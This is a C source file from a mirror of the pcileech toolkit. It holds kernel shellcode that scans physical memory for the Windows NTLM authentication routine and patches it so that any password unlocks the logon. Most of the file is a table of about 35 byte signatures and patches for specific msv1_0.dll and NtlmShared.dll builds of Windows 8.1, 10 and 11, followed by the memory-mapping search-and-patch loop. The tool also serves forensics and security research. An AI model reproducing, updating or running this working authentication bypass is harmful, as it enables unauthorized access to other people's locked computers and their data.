lywsvip/pcileech
1
0
Fork 0
mirror of https://github.com/ufrisk/pcileech.git synced 2026-05-08 14:36:25 +08:00
Code Issues Packages Projects Releases Wiki Activity
Files
master
pcileech/pcileech_shellcode/wx64_unlock.c
Ulf Frisk fc6c913b67 Version 4.19.2
2025-04-18 19:31:33 +02:00

419 lines
19 KiB
C
Raw Permalink Blame History

// wx64_unlock.c : kernel code to remove the password requirement when logging on to Windows.
//
// (c) Ulf Frisk, 2016-2020
// Author: Ulf Frisk, pcileech@frizk.net
//
// compile with (normal mode):
// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel wx64_common.c
// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel wx64_unlock.c
// ml64.exe wx64_common_a.asm /Fewx64_unlock.exe /link /NODEFAULTLIB /RELEASE /MACHINE:X64 /entry:main wx64_unlock.obj wx64_common.obj
// shellcode64.exe -o wx64_unlock.exe "WINDOWS UNLOCKER - REMOVE PASSWORD REQUIREMENT! \n===============================================================\nREQUIRED OPTIONS: \n -0 : Set to one (1) in order to unlock. \n Example: '-0 1'. \n===== RESULT AFTER UNLOCK ATTEMPT (0=SUCCESS) =================%s\nNTSTATUS : 0x%08X \n===============================================================\n"
//
// compile with (standalone [8051] mode):
// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel wx64_common.c
// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel wx64_unlock.c
// ml64.exe wx64_unlock_standalone.asm /Fewx64_unlock.exe /link /NODEFAULTLIB /RELEASE /MACHINE:X64 /entry:main wx64_unlock.obj wx64_common.obj
// shellcode64.exe -o wx64_unlock.exe "DUMMY"
//
#include "wx64_common.h"
// ----------------------------- KERNEL DEFINES AND TYPEDEFS BELOW -----------------------------
typedef __int64 PHYSICAL_ADDRESS, *PPHYSICAL_ADDRESS;
typedef struct _PHYSICAL_MEMORY_RANGE {
QWORD BaseAddress;
QWORD NumberOfBytes;
} PHYSICAL_MEMORY_RANGE, *PPHYSICAL_MEMORY_RANGE;
#pragma pack(push, 1) /* DISABLE STRUCT PADDINGS (REENABLE AFTER STRUCT DEFINITIONS) */
typedef struct _IDT_DESCRIPTOR {
DWORD dwOpaque1;
QWORD qwAddressISR;
DWORD dwOpaque2;
} IDT_DESCRIPTOR, *PIDT_DESCRIPTOR;
typedef struct _IDTR {
WORD nBytes;
PIDT_DESCRIPTOR pIDT_DESCRIPTOR;
} IDTR, *PIDTR;
#pragma pack(pop) /* RE-ENABLE STRUCT PADDINGS */
//----------------------------------------------------------------------------------------------------------
#undef RtlCompareMemory
#undef RtlCopyMemory
typedef struct tdKERNEL_FUNCTIONS2 {
VOID(*ExFreePool)(
_In_ PVOID P);
PHYSICAL_ADDRESS(*MmGetPhysicalAddress)(
_In_ PVOID BaseAddress
);
PPHYSICAL_MEMORY_RANGE(*MmGetPhysicalMemoryRanges)(
VOID
);
PVOID(*MmMapIoSpace)(
_In_ PHYSICAL_ADDRESS PhysicalAddress,
_In_ SIZE_T NumberOfBytes,
_In_ MEMORY_CACHING_TYPE CacheType
);
VOID(*MmUnmapIoSpace)(
_In_ PVOID BaseAddress,
_In_ SIZE_T NumberOfBytes
);
SIZE_T(*RtlCompareMemory)(
_In_ const VOID *Source1,
_In_ const VOID *Source2,
_In_ SIZE_T Length
);
VOID(*RtlCopyMemory)(
_Out_ VOID UNALIGNED *Destination,
_In_ const VOID UNALIGNED *Source,
_In_ SIZE_T Length
);
} KERNEL_FUNCTIONS2, *PKERNEL_FUNCTIONS2;
VOID InitializeKernelFunctions2(_In_ QWORD qwNtosBase, _Out_ PKERNEL_FUNCTIONS2 fnk2)
{
QWORD FUNC2[][2] = {
{ &fnk2->ExFreePool, H_ExFreePool },
{ &fnk2->MmGetPhysicalAddress, H_MmGetPhysicalAddress },
{ &fnk2->MmGetPhysicalMemoryRanges, H_MmGetPhysicalMemoryRanges },
{ &fnk2->MmMapIoSpace, H_MmMapIoSpace },
{ &fnk2->MmUnmapIoSpace, H_MmUnmapIoSpace },
{ &fnk2->RtlCompareMemory, H_RtlCompareMemory },
{ &fnk2->RtlCopyMemory, H_RtlCopyMemory }
};
for(QWORD j = 0; j < (sizeof(FUNC2) / sizeof(QWORD[2])); j++) {
*(PQWORD)FUNC2[j][0] = PEGetProcAddressH(qwNtosBase, (DWORD)FUNC2[j][1]);
}
}
//----------------------------------------------------------------------------------------------------------
typedef struct tdSignatureChunk {
WORD cbOffset;
BYTE cb;
BYTE pb[20];
} SIGNATURE_CHUNK, *PSIGNATURE_CHUNK;
typedef struct tdSignature {
// in unlock mode:
// chunk[0] = signature chunk 1 (required)
// chunk[1] = signature chunk 2 (optional)
// chunk[2] = patch chunk (required)
SIGNATURE_CHUNK chunk[3];
} SIGNATURE, *PSIGNATURE;
//----------------------------------------------------------------------------------------------------------
NTSTATUS Unlock_FindAndPatch(_In_ PKERNEL_FUNCTIONS2 fnk2, _Inout_ PBYTE pbPages, _In_ DWORD cPages, _In_ PSIGNATURE pSignatures, _In_ DWORD cSignatures)
{
PBYTE pb;
DWORD pgIdx, i;
PSIGNATURE ps;
for(pgIdx = 0; pgIdx < cPages; pgIdx++) {
pb = pbPages + (4096 * pgIdx);
for(i = 0; i < cSignatures; i++) {
ps = pSignatures + i;
if(!ps->chunk[0].cb || (ps->chunk[0].cb != fnk2->RtlCompareMemory(pb + ps->chunk[0].cbOffset, ps->chunk[0].pb, ps->chunk[0].cb))) {
continue;
}
if(ps->chunk[1].cb && (ps->chunk[1].cb != fnk2->RtlCompareMemory(pb + ps->chunk[1].cbOffset, ps->chunk[1].pb, ps->chunk[1].cb))) {
continue;
}
fnk2->RtlCopyMemory(pb + ps->chunk[2].cbOffset, ps->chunk[2].pb, ps->chunk[2].cb);
return S_OK;
}
}
return E_FAIL;
}
#define NUMBER_OF_SIGNATURES 35
NTSTATUS Unlock(_In_ QWORD qwAddrNtosBase)
{
SIGNATURE oSigs[] = {
// win8.1x64 msv1_0.dll (2014-10-29)
{ .chunk = {
{ .cbOffset = 0x5df,.cb = 4,.pb = { 0xFF, 0x15, 0x42, 0xA4 } },
{ .cbOffset = 0x5e8,.cb = 4,.pb = { 0x0F, 0x85, 0x46, 0x88 } },
{ .cbOffset = 0x5e8,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// win8.1x64 msv1_0.dll (2015-10-30)
{ .chunk = {
{ .cbOffset = 0x5df,.cb = 4,.pb = { 0xFF, 0x15, 0xC2, 0x07 } },
{ .cbOffset = 0x5e8,.cb = 4,.pb = { 0x0F, 0x85, 0xCE, 0xBC } },
{ .cbOffset = 0x5e8,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// win8.1x64 msv1_0.dll (2016-03-16)
{ .chunk = {
{ .cbOffset = 0x5df,.cb = 4,.pb = { 0xFF, 0x15, 0x22, 0x04 } },
{ .cbOffset = 0x5e8,.cb = 4,.pb = { 0x0F, 0x85, 0xB2, 0xB9 } },
{ .cbOffset = 0x5e8,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// AUTO-GENERATED SIGNATURES BELOW:
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.10240.16384 / 2015-07-10]
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.10240.18366 / 2019-09-30]
{.chunk = {
{.cbOffset = 0x5DC,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0x4B, 0x1C, 0x00, 0x00 } },
{.cbOffset = 0x5E8,.cb = 6,.pb = { 0x0F, 0x85, 0x18, 0xFB, 0xFF, 0xFF } },
{.cbOffset = 0x5E8,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.10240.19387 / 2022-08-04]
{.chunk = {
{.cbOffset = 0x65C,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xCB, 0x1B, 0x00, 0x00 } },
{.cbOffset = 0x668,.cb = 6,.pb = { 0x0F, 0x85, 0x18, 0xFB, 0xFF, 0xFF } },
{.cbOffset = 0x668,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.10240.19869 / 2023-03-30]
{.chunk = {
{.cbOffset = 0x66C,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xBB, 0x1B, 0x00, 0x00 } },
{.cbOffset = 0x678,.cb = 6,.pb = { 0x0F, 0x85, 0x18, 0xFB, 0xFF, 0xFF } },
{.cbOffset = 0x678,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.10586.0 / 2015-10-30]
{.chunk = {
{.cbOffset = 0x62C,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xB3, 0x1B, 0x00, 0x00 } },
{.cbOffset = 0x638,.cb = 6,.pb = { 0x0F, 0x85, 0x18, 0xFB, 0xFF, 0xFF } },
{.cbOffset = 0x638,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.14393.0 / 2016-07-16]
{.chunk = {
{.cbOffset = 0x6DC,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xD3, 0x1B, 0x00, 0x00 } },
{.cbOffset = 0x6E8,.cb = 6,.pb = { 0x0F, 0x85, 0x18, 0xFB, 0xFF, 0xFF } },
{.cbOffset = 0x6E8,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.14393.2791 / 2019-02-06]
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.14393.3269 / 2019-09-29]
{.chunk = {
{.cbOffset = 0x6EC,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xC3, 0x1B, 0x00, 0x00 } },
{.cbOffset = 0x6F8,.cb = 6,.pb = { 0x0F, 0x85, 0x18, 0xFB, 0xFF, 0xFF } },
{.cbOffset = 0x6F8,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.14393.5291 / 2022-08-07]
{.chunk = {
{.cbOffset = 0x76C,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0x43, 0x1B, 0x00, 0x00 } },
{.cbOffset = 0x778,.cb = 6,.pb = { 0x0F, 0x85, 0x18, 0xFB, 0xFF, 0xFF } },
{.cbOffset = 0x778,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.14393.5850 / 2023-03-30]
{.chunk = {
{.cbOffset = 0x77C,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0x33, 0x1B, 0x00, 0x00 } },
{.cbOffset = 0x788,.cb = 6,.pb = { 0x0F, 0x85, 0x18, 0xFB, 0xFF, 0xFF } },
{.cbOffset = 0x788,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.15063.1631 / 2019-02-06]
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.15063.2106 / 2019-09-30]
{.chunk = {
{.cbOffset = 0x622,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xB5, 0x1C, 0x00, 0x00 } },
{.cbOffset = 0x62E,.cb = 6,.pb = { 0x0F, 0x85, 0x2E, 0xFB, 0xFF, 0xFF } },
{.cbOffset = 0x62E,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.15254.245 / 2018-01-30]
{.chunk = {
{.cbOffset = 0x612,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xC5, 0x1C, 0x00, 0x00 } },
{.cbOffset = 0x61E,.cb = 6,.pb = { 0x0F, 0x85, 0x2E, 0xFB, 0xFF, 0xFF } },
{.cbOffset = 0x61E,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.16299.1268 / 2019-07-05]
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.16299.1448 / 2019-10-02]
{.chunk = {
{.cbOffset = 0x622,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xC5, 0x1C, 0x00, 0x00 } },
{.cbOffset = 0x62E,.cb = 6,.pb = { 0x0F, 0x85, 0x2E, 0xFB, 0xFF, 0xFF } },
{.cbOffset = 0x62E,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.16299.192 / 2018-01-01]
{.chunk = {
{.cbOffset = 0x612,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xD5, 0x1C, 0x00, 0x00 } },
{.cbOffset = 0x61E,.cb = 6,.pb = { 0x0F, 0x85, 0x2E, 0xFB, 0xFF, 0xFF } },
{.cbOffset = 0x61E,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.17134.1067 / 2019-10-02]
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.17134.590 / 2019-02-06]
{.chunk = {
{.cbOffset = 0x6A2,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0x45, 0x1C, 0x00, 0x00 } },
{.cbOffset = 0x6AE,.cb = 6,.pb = { 0x0F, 0x85, 0x2E, 0xFB, 0xFF, 0xFF } },
{.cbOffset = 0x6AE,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.17134.523 / 2019-01-01]
{.chunk = {
{.cbOffset = 0x692,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0x55, 0x1C, 0x00, 0x00 } },
{.cbOffset = 0x69E,.cb = 6,.pb = { 0x0F, 0x85, 0x2E, 0xFB, 0xFF, 0xFF } },
{.cbOffset = 0x69E,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.17763.10935 / 2022-08-05]
{.chunk = {
{.cbOffset = 0x7CD,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0x22, 0x1B, 0x00, 0x00 } },
{.cbOffset = 0x7D9,.cb = 6,.pb = { 0x0F, 0x84, 0x0B, 0xFB, 0xFF, 0xFF } },
{.cbOffset = 0x7D9,.cb = 2,.pb = { 0x0F, 0x85 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.17763.194 / 2018-12-04]
{.chunk = {
{.cbOffset = 0x73D,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xB2, 0x1B, 0x00, 0x00 } },
{.cbOffset = 0x749,.cb = 6,.pb = { 0x0F, 0x84, 0x0B, 0xFB, 0xFF, 0xFF } },
{.cbOffset = 0x749,.cb = 2,.pb = { 0x0F, 0x85 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.17763.316 / 2019-02-06]
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.17763.802 / 2019-10-02]
{.chunk = {
{.cbOffset = 0x74D,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xA2, 0x1B, 0x00, 0x00 } },
{.cbOffset = 0x759,.cb = 6,.pb = { 0x0F, 0x84, 0x0B, 0xFB, 0xFF, 0xFF } },
{.cbOffset = 0x759,.cb = 2,.pb = { 0x0F, 0x85 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.17763.5122 / 2023-11-08]
{.chunk = {
{.cbOffset = 0x7DD,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0x12, 0x1B, 0x00, 0x00 } },
{.cbOffset = 0x7E9,.cb = 6,.pb = { 0x0F, 0x84, 0x0B, 0xFB, 0xFF, 0xFF } },
{.cbOffset = 0x7E9,.cb = 2,.pb = { 0x0F, 0x85 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.18362.1 / 2019-03-18]
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.18362.10022 / 2019-09-15]
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.18362.418 / 2019-10-06]
{.chunk = {
{.cbOffset = 0x72F,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xC0, 0x1B, 0x00, 0x00 } },
{.cbOffset = 0x73B,.cb = 6,.pb = { 0x0F, 0x84, 0x09, 0xFB, 0xFF, 0xFF } },
{.cbOffset = 0x73B,.cb = 2,.pb = { 0x0F, 0x85 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.1 / 2019-12-07]
{.chunk = {
{.cbOffset = 0x423,.cb = 10,.pb = { 0x48, 0x8B, 0xCB, 0x48, 0xFF, 0x15, 0x53, 0x20, 0x00, 0x00 } },
{.cbOffset = 0x435,.cb = 6,.pb = { 0x0F, 0x84, 0xBA, 0xFA, 0xFF, 0xFF } },
{.cbOffset = 0x435,.cb = 2,.pb = { 0x0F, 0x85 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.2728 / 2023-03-09]
{.chunk = {
{.cbOffset = 0x4B3,.cb = 10,.pb = { 0x48, 0x8B, 0xCB, 0x48, 0xFF, 0x15, 0xC3, 0x1F, 0x00, 0x00 } },
{.cbOffset = 0x4C5,.cb = 6,.pb = { 0x0F, 0x84, 0xBA, 0xFA, 0xFF, 0xFF } },
{.cbOffset = 0x4C5,.cb = 2,.pb = { 0x0F, 0x85 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.2965 / 2023-04-27]
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.3636 / 2023-10-20]
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.3684 / 2023-10-17]
{.chunk = {
{.cbOffset = 0x4C3,.cb = 10,.pb = { 0x48, 0x8B, 0xCB, 0x48, 0xFF, 0x15, 0xB3, 0x1F, 0x00, 0x00 } },
{.cbOffset = 0x4D5,.cb = 6,.pb = { 0x0F, 0x84, 0xBA, 0xFA, 0xFF, 0xFF } },
{.cbOffset = 0x4D5,.cb = 2,.pb = { 0x0F, 0x85 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.4474 / 2024-05-18]
{.chunk = {
{.cbOffset = 0x583,.cb = 10,.pb = { 0x48, 0x8B, 0xCB, 0x48, 0xFF, 0x15, 0xF3, 0x1E, 0x00, 0x00 } },
{.cbOffset = 0x595,.cb = 6,.pb = { 0x0F, 0x84, 0xBA, 0xFA, 0xFF, 0xFF } },
{.cbOffset = 0x595,.cb = 2,.pb = { 0x0F, 0x85 } } }
},
// Signature for Windows 11 x64 [NtlmShared.dll 10.0.20348.1668 / 2023-03-30]
{.chunk = {
{.cbOffset = 0xA7B,.cb = 10,.pb = { 0x48, 0x8B, 0xCB, 0x48, 0xFF, 0x15, 0xA3, 0x28, 0x00, 0x00 } },
{.cbOffset = 0xA8D,.cb = 6,.pb = { 0x0F, 0x84, 0xB2, 0xFA, 0xFF, 0xFF } },
{.cbOffset = 0xA8D,.cb = 2,.pb = { 0x0F, 0x85 } } }
},
// Signature for Windows 11 x64 [NtlmShared.dll 10.0.20348.887 / 2022-08-04]
{.chunk = {
{.cbOffset = 0xA6B,.cb = 10,.pb = { 0x48, 0x8B, 0xCB, 0x48, 0xFF, 0x15, 0xB3, 0x28, 0x00, 0x00 } },
{.cbOffset = 0xA7D,.cb = 6,.pb = { 0x0F, 0x84, 0xB2, 0xFA, 0xFF, 0xFF } },
{.cbOffset = 0xA7D,.cb = 2,.pb = { 0x0F, 0x85 } } }
},
// Signature for Windows 11 x64 [NtlmShared.dll 10.0.22000.1696 / 2023-03-09]
{.chunk = {
{.cbOffset = 0x00B,.cb = 10,.pb = { 0x48, 0x8B, 0xCB, 0x48, 0xFF, 0x15, 0xE3, 0x22, 0x00, 0x00 } },
{.cbOffset = 0x01D,.cb = 6,.pb = { 0x0F, 0x84, 0xB2, 0xFA, 0xFF, 0xFF } },
{.cbOffset = 0x01D,.cb = 2,.pb = { 0x0F, 0x85 } } }
},
// Signature for Windows 11 x64 [NtlmShared.dll 10.0.22000.2600 / 2023-11-08]
{.chunk = {
{.cbOffset = 0x01B,.cb = 10,.pb = { 0x48, 0x8B, 0xCB, 0x48, 0xFF, 0x15, 0xD3, 0x22, 0x00, 0x00 } },
{.cbOffset = 0x02D,.cb = 6,.pb = { 0x0F, 0x84, 0xB2, 0xFA, 0xFF, 0xFF } },
{.cbOffset = 0x02D,.cb = 2,.pb = { 0x0F, 0x85 } } }
},
// Signature for Windows 11 x64 [NtlmShared.dll 10.0.22000.778 / 2022-06-18]
{.chunk = {
{.cbOffset = 0xF8B,.cb = 10,.pb = { 0x48, 0x8B, 0xCB, 0x48, 0xFF, 0x15, 0x63, 0x23, 0x00, 0x00 } },
{.cbOffset = 0xF9D,.cb = 6,.pb = { 0x0F, 0x84, 0xB2, 0xFA, 0xFF, 0xFF } },
{.cbOffset = 0xF9D,.cb = 2,.pb = { 0x0F, 0x85 } } }
},
// Signature for Windows 11 x64 [NtlmShared.dll 10.0.22621.2067 / 2023-07-11]
// Signature for Windows 11 x64 [NtlmShared.dll 10.0.22621.2506 / 2023-10-19]
// Signature for Windows 11 x64 [NtlmShared.dll 10.0.22621.2567 / 2023-10-14]
{.chunk = {
{.cbOffset = 0xFC9,.cb = 11,.pb = { 0x48, 0x8D, 0x4B, 0x10, 0x48, 0xFF, 0x15, 0x2C, 0x23, 0x00, 0x00 } },
{.cbOffset = 0xFDC,.cb = 6,.pb = { 0x0F, 0x85, 0xC4, 0xFA, 0xFF, 0xFF } },
{.cbOffset = 0xFDC,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Signature for Windows 11 x64 [NtlmShared.dll 10.0.26100.1 / 2024-04-01]
// Signature for Windows 11 x64 [NtlmShared.dll 10.0.26100.1150 / 2024-07-03]
// Signature for Windows 11 x64 [NtlmShared.dll 10.0.26100.1591 / 2024-08-21]
// Signature for Windows 11 x64 [NtlmShared.dll 10.0.26100.1882 / 2024-09-28]
// Signature for Windows 11 x64 [NtlmShared.dll 10.0.26100.2454 / 2024-11-16]
// Signature for Windows 11 x64 [NtlmShared.dll 10.0.26100.712 / 2024-05-16]
{.chunk = {
{.cbOffset = 0xB31,.cb = 13,.pb = { 0x4D, 0x2B, 0xF5, 0x75, 0xEF, 0x84, 0xD2, 0x74, 0x0A, 0x32, 0xC0, 0xEB, 0x09 } },
{.cbOffset = 0xB3A,.cb = 2,.pb = { 0x32, 0xC0 } },
{.cbOffset = 0xB3A,.cb = 2,.pb = { 0xB0, 0x01 } } }
},
// Signature for Windows 11 x64 [NtlmShared.dll 10.0.26100.2894 / 2025-01-12]
// Signature for Windows 11 x64 [NtlmShared.dll 10.0.26100.3037 / 2025-01-24]
{.chunk = {
{.cbOffset = 0x6A1,.cb = 20,.pb = { 0x4D, 0x2B, 0xFE, 0x75, 0xEF, 0x84, 0xD2, 0x0F, 0x84, 0x42, 0xF8, 0xFF, 0xFF, 0x32, 0xC0, 0xE9, 0x3E, 0xF8, 0xFF, 0xFF } },
{.cbOffset = 0x6AE,.cb = 2,.pb = { 0x32, 0xC0 } },
{.cbOffset = 0x6AE,.cb = 2,.pb = { 0xB0, 0x01 } } }
},
// Signature for Windows 11 x64 [NtlmShared.dll 10.0.26100.3323 / 2025-02-21]
// Signature for Windows 11 x64 [NtlmShared.dll 10.0.26100.3624 / 2025-03-22]
{.chunk = {
{.cbOffset = 0x6C1,.cb = 20,.pb = { 0x4D, 0x2B, 0xFE, 0x75, 0xEF, 0x84, 0xD2, 0x0F, 0x84, 0x42, 0xF8, 0xFF, 0xFF, 0x32, 0xC0, 0xE9, 0x3E, 0xF8, 0xFF, 0xFF } },
{.cbOffset = 0x6CE,.cb = 2,.pb = { 0x32, 0xC0 } },
{.cbOffset = 0x6CE,.cb = 2,.pb = { 0xB0, 0x01 } } }
},
};
KERNEL_FUNCTIONS2 fnk2;
PPHYSICAL_MEMORY_RANGE pMemMap, pMM;
SIZE_T i, cMemMap;
QWORD qwBaseAddress = 0;
PVOID pvMemory;
NTSTATUS nt;
// 1: Intialize function table
InitializeKernelFunctions2(qwAddrNtosBase, &fnk2);
// 2: Retrieve physical memory map
pMemMap = fnk2.MmGetPhysicalMemoryRanges();
if(pMemMap == NULL) {
return E_FAIL;
}
for(cMemMap = 0; pMemMap[cMemMap].BaseAddress || pMemMap[cMemMap].NumberOfBytes; cMemMap++);
// 3: Search memory and unlock if signature is found
while(qwBaseAddress + 0x10000 <= pMemMap[cMemMap - 1].BaseAddress + pMemMap[cMemMap - 1].NumberOfBytes) {
for(i = 0; i < cMemMap; i++) {
pMM = &pMemMap[i];
if(((pMM->BaseAddress < qwBaseAddress) && (pMM->BaseAddress + pMM->NumberOfBytes > qwBaseAddress + 0x10000))) {
// is inside range!
pvMemory = fnk2.MmMapIoSpace(qwBaseAddress, 0x10000, 0);
if(pvMemory) {
nt = Unlock_FindAndPatch(&fnk2, pvMemory, 0x10000 / 0x1000, oSigs, NUMBER_OF_SIGNATURES);
fnk2.MmUnmapIoSpace(pvMemory, 0x10000);
if(NT_SUCCESS(nt)) {
// found and patched! - exit!
goto cleanup;
}
}
break;
}
}
qwBaseAddress += 0x10000;
}
nt = E_FAIL;
cleanup:
fnk2.ExFreePool(pMemMap);
return nt;
}
VOID c_EntryPoint(_In_ PKMDDATA pk)
{
if(pk->dataIn[0] == 1) {
pk->dataOut[0] = (QWORD)Unlock(pk->AddrKernelBase);
} else {
pk->dataOut[0] = ERROR_INVALID_PARAMETER;
}
}
Reference in New Issue View Git Blame Copy Permalink